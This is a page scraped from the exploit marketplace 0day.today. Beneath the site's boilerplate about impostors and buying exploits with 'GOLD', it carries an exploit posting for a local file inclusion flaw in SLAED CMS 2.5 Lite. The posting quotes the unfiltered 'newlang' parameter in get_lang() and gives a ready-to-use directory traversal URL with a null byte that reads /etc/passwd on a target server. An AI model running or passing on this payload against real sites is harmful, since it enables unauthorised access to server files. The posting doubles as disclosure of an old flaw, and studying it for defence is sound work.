0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SLAED CMS 2.5 Lite (newlang) Local File Inclusion Vulnerability
=============================================================== SLAED CMS 2.5 Lite (newlang) Local File Inclusion Vulnerability =============================================================== # SLAED CMS 2.5 Lite Local file inclusion # Script url http://www.slaed.net/uploads/files/public/SLAED_CMS_2.5_Lite.zip # Lets code in function/sources.php: 780: // Format language 781: function get_lang($module="") { 782: global $multilingual, $currentlang, $language, $user_cookie_t; 783: if (isset($_REQUEST['newlang']) && $multilingual == "1") { 784: if (file_exists("language/lang-".$_REQUEST['newlang'].".php")) { 785: setcookie("lang", $_REQUEST['newlang'], time() + intval($user_cookie_t)); 786: require_once("language/lang-".$_REQUEST['newlang'].".php"); ... And in index.php: 9: require_once("function/function.php"); 10: get_lang(); # As you can see variable newlang is not filtered, so, if magic_quotes_gpc turned off, we can use exploit: http://[targethost]/[path]/index.php?newlang=../../../../../../../../../../etc/passwd%00 # Bug discovered by The_HuliGun # Greetz to: NaTka and all people who understand... # See u soon! # 0day.today [2024-11-15] #